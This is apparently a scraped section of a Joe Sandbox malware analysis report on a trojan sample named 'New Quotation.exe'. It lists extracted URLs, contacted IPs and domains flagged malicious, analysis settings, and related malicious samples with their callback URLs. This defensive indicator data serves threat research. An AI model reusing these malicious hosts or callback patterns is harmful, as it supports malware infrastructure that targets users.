                                                                                  https://www.msn.com/en-us/news/politics/white-house-chaos-as-video-shows-joe-biden-aides-stop-reportexplorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://aka.ms/odirmexplorer.exe, 0000000A.00000000.49459497536.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49579842932.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49356288343.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49407255010.00000000095B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.microsoexplorer.exe, 0000000A.00000000.49459497536.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49579842932.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49356288343.00000000095B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49407255010.00000000095B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.google.comnetsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdNew Quotation.exe, 00000007.00000001.49189110722.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://lcm-brokers.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://repository.certum.pl/ctsca2021.cer0netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                            		high
                                                                                            http://subca.ocsp-certum.com05netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://drive.google.com/New Quotation.exe, 00000007.00000002.49635663591.0000000001911000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://subca.ocsp-certum.com02netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://subca.ocsp-certum.com01netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://doc-14-as-docs.googleusercontent.com/New Quotation.exe, 00000007.00000003.49331881639.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49636406338.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49336268116.0000000001960000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49614489090.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49635811481.0000000001928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://crl.certum.pl/ctnca2.crl0lnetsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                                  		high
                                                                                                  http://lcm-brokers.comnetsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://repository.certum.pl/ctnca2.cer09netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                                    		high
                                                                                                    https://windows.msn.cn/shellRESPexplorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://parking.bodiscdn.comnetsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://lcm-brokers.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://doc-14-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/do4pmediNew Quotation.exe, 00000007.00000002.49636132043.0000000001947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://lcm-brokers.com/xmlrpc.php?rsdnetsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.certum.pl/CPS0netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                                          		high
                                                                                                          https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/SmoothScroll.js?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://repository.certum.pl/ctnca.cer09netsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                                                		high
                                                                                                                http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/bootstrap.js?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://crl.certum.pl/ctnca.crl0knetsh.exe, 00000011.00000002.54000007182.00000000036EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000011.00000002.53994544477.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exefalse
                                                                                                                  		high
                                                                                                                  https://android.notify.windows.com/iOSopexplorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://lcm-brokers.com/wp-json/netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://lcm-brokers.com/netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/custom.css?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://doc-14-as-docs.googleusercontent.com/(iNew Quotation.exe, 00000007.00000002.49635811481.0000000001928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://api.w.org/netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://nsis.sf.net/NSIS_ErrorErrorNew Quotation.exefalse
                                                                                                                            		high
                                                                                                                            http://www.foreca.comexplorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://doc-14-as-docs.googleusercontent.com/TNew Quotation.exe, 00000007.00000003.49331881639.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49636406338.0000000001963000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49336268116.0000000001960000.00000004.00000020.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49614489090.0000000001963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/ie.css?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://wns.windows.com/Dexplorer.exe, 0000000A.00000000.49446749601.0000000000B61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49393153802.0000000000B61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49565465605.0000000000B61000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49345620322.0000000000B61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://lcm-brokers.com/wp-includes/wlwmanifest.xmlnetsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://outlook.combweexplorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://android.notify.windows.com/iOS/explorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://lcm-brokers.com/wp-content/themes/advance-portfolio/style.css?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdNew Quotation.exe, 00000007.00000001.49189110722.00000000005F2000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://api.msn.com/explorer.exe, 0000000A.00000000.49427367248.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49482863595.0000000010957000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49375457451.0000000010957000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/bootstrap.css?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://windows.msn.com:443/shellexplorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://lcm-brokers.com/category/%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%bnetsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://lcm-brokers.com/wp-content/uploads/2019/02/1694284689_cb68647c-011d-4340-a998-8a154d3b42dc.pnnetsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/fontawesome-all.css?ver=5.1.13netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://www.msn.com:443/en-us/feedexplorer.exe, 0000000A.00000000.49456065054.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49576397455.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49353233940.0000000005248000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49403539747.0000000005248000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://lcm-brokers.com/%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b9%88%e0%bnetsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://word.office.comToexplorer.exe, 0000000A.00000000.49477427067.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49597081612.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49423431400.000000000D2F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49370732631.000000000D2F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://lcm-brokers.com/wp-includes/js/jquery/jquery.js?ver=1.12.4netsh.exe, 00000011.00000002.54000468452.0000000003BDF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown

                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public IPs

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                99.83.175.80
                                                                                                                                                		www.cardviews.netUnited States
                                                                                                                                                		16509AMAZON-02UStrue
                                                                                                                                                216.58.212.147
                                                                                                                                                		ghs.google.comUnited States
                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                93.89.226.17
                                                                                                                                                		puude.onlineTurkey
                                                                                                                                                		51557TR-FBSTRtrue
                                                                                                                                                116.204.133.148
                                                                                                                                                		22.301url.xyzChina
                                                                                                                                                		136160BSYNTCL-AS-APBeijingShijihulianYuntongNetworkTechnologytrue
                                                                                                                                                199.59.243.220
                                                                                                                                                		www.lax0.comUnited States
                                                                                                                                                		395082BODIS-NJUStrue
                                                                                                                                                172.105.250.34
                                                                                                                                                		lcm-brokers.comUnited States
                                                                                                                                                		63949LINODE-APLinodeLLCUStrue
                                                                                                                                                154.219.125.79
                                                                                                                                                		www.outletgals.comSeychelles
                                                                                                                                                		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                43.225.157.245
                                                                                                                                                		www.ranabroimpexp.comHong Kong
                                                                                                                                                		133115HKKFGL-AS-APHKKwaifongGroupLimitedHKtrue
                                                                                                                                                176.53.69.151
                                                                                                                                                		onlinesinavsistemi.xyzTurkey
                                                                                                                                                		42926RADORETRtrue
                                                                                                                                                8.214.69.48
                                                                                                                                                		www.rlxijvrd.comSingapore
                                                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                23.227.38.74
                                                                                                                                                		shops.myshopify.comCanada
                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                185.45.67.192
                                                                                                                                                		bkbc.siteBulgaria
                                                                                                                                                		201200SUPERHOSTING_ASBGtrue
                                                                                                                                                82.98.135.44
                                                                                                                                                		www.somosnuecru.comSpain
                                                                                                                                                		42612DINAHOSTING-ASEStrue
                                                                                                                                                93.184.220.29
                                                                                                                                                		unknownEuropean Union
                                                                                                                                                		15133EDGECASTUSfalse
                                                                                                                                                46.38.243.234
                                                                                                                                                		www.soussecloud.comGermany
                                                                                                                                                		197540NETCUP-ASnetcupGmbHDEtrue
                                                                                                                                                185.104.28.238
                                                                                                                                                		www.tuinkunst.onlineNetherlands
                                                                                                                                                		206281AS-ZXCSNLtrue
                                                                                                                                                152.228.155.71
                                                                                                                                                		solaksa.netUnited States
                                                                                                                                                		1767ILIGHT-NETUStrue
                                                                                                                                                142.250.186.110
                                                                                                                                                		drive.google.comUnited States
                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                198.54.117.211
                                                                                                                                                		parkingpage.namecheap.comUnited States
                                                                                                                                                		22612NAMECHEAP-NETUSfalse
                                                                                                                                                172.217.19.65
                                                                                                                                                		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                		15169GOOGLEUSfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                Analysis ID:643108
                                                                                                                                                Start date and time: 10/06/202207:49:462022-06-10 07:49:46 +02:00
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 17m 19s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:New Quotation.exe
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                Run name:Suspected Instruction Hammering
                                                                                                                                                Number of analysed new started processes analysed:27
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.evad.winEXE@10/4@20/20
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 85.2% (good quality ratio 77.6%)
                                                                                                                                                • Quality average: 74.7%
                                                                                                                                                • Quality standard deviation: 30.9%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 100
                                                                                                                                                • Number of non-executed functions: 290
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI

                                                                                                                                                Warnings

                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                99.83.175.80FATURA_S.EXEGet hashmaliciousBrowse
                                                                                                                                                • www.tprs.club/i9ng/?k6A=_ZsLEbjxGHsx&4h=PDwL668XVrB4Hd/zDw9KoCsOhytz/EMOlMYGsSBeL0lJmcB1M+eYXFEP8HLJKj0iajBP
                                                                                                                                                Remittance_List_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • www.tiktok-lifts.com/mc3w/?BjoHnv=gPf7wD1GB6mGlvoKcfiYTv13Sg89AF/27U1NGgn3/ExlqDrIHCCZIDk5exPkElf91rqhzalEXg==&hFNLE=uDHhUflPWJAT
                                                                                                                                                DI-INV000921.xlsxGet hashmaliciousBrowse
                                                                                                                                                • www.tiktok-lifts.com/mc3w/?atB=GhedRfnXhj5xbV&4hcPupUH=gPf7wD1DB9mCl/kGefiYTv13Sg89AF/27Utdaj727kxkqyHOASTVeHc7dXPbD1n23LCHqg==
                                                                                                                                                11#U6708 16#U65e5 BL #U505a#U6cd5 SO NO J624 - #U9577#U5f91ISF DETAILS SO J624.exeGet hashmaliciousBrowse
                                                                                                                                                • www.buyexcessinventory.com/mc6b/?jHED=cHbiMmGWaZkceW2AlesbiY8EfglfiIJr76gGI2L5hVz+rgshnHwxb1XwtPHyXl/CsZ2U7bIQHg==&w6=8plPSXxhdVSDsH
                                                                                                                                                Quotation-Pepper Fuchs- Asia Pte. Ltd..exeGet hashmaliciousBrowse
                                                                                                                                                • www.whitmereliye.com/im8r/?RDHLRbJX=CFV1HKwfNrYVAxQwUK5OWHYUN3nuVhBgE+kMNDxLHGesPtBsGDdI6H95KPA+emUvKpXw&OZxLD=6lWly
                                                                                                                                                order spacification pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • www.pydyc.com/h388/?v468Mla=kwgU2VSzDry52pOElWtoAr4xa1L5Oc9R7fVnyRTHpPqr4cuOGP9dkhOUBKDiJzKd1Aol&-Zr8=V44l1R
                                                                                                                                                Payment Advice____pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • studenhances.com/ari/Panel/fre.php
                                                                                                                                                93.89.226.17__ __ __.exeGet hashmaliciousBrowse
                                                                                                                                                • www.medisola.xyz/u3r5/?4hD=McQdCEXtXzWB5whKCtrQdPG/bPSjqoHZ/T6cBk1sJ2ucgmYEj6nXGpT3V2LF03JDtsWA&nPn=4hU4
                                                                                                                                                PO.exeGet hashmaliciousBrowse
                                                                                                                                                • www.siyahteknoloji.xyz/aw9e/?Bnt=uUP4ZkK/nYmJzlqORq03FZYMIj5t2Sx0dzhnZw6EzAkKMlEoJf+K/lgL9E4ftp/0TYqA&Jlz=X2Mt0T7x
                                                                                                                                                PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                                                                                                                                • www.fantamoda.xyz/mua8/?w48t=0pY022IXUBwLfpfP&nflpdH=fMXFyymnYQJO5yUQKIA4nJ8YqLveLzrMKpCjiFXEMIRRoXt5pZce0HzM3g8o+UcU0pHv
                                                                                                                                                Confirm!!!.exeGet hashmaliciousBrowse
                                                                                                                                                • www.davidguner.com/3iw/?1bw=L6AdKvB0Q218P06P&yN9xK8-X=Fql9g/ma7c+/rW8IcvIPMzGIUc5v7dMVbxDoc426ShI3pwVnZjmExMTk1y1t/ro+8pGW
                                                                                                                                                New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?4h0=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTkkLCkrZuce+&wR=OtxhY2
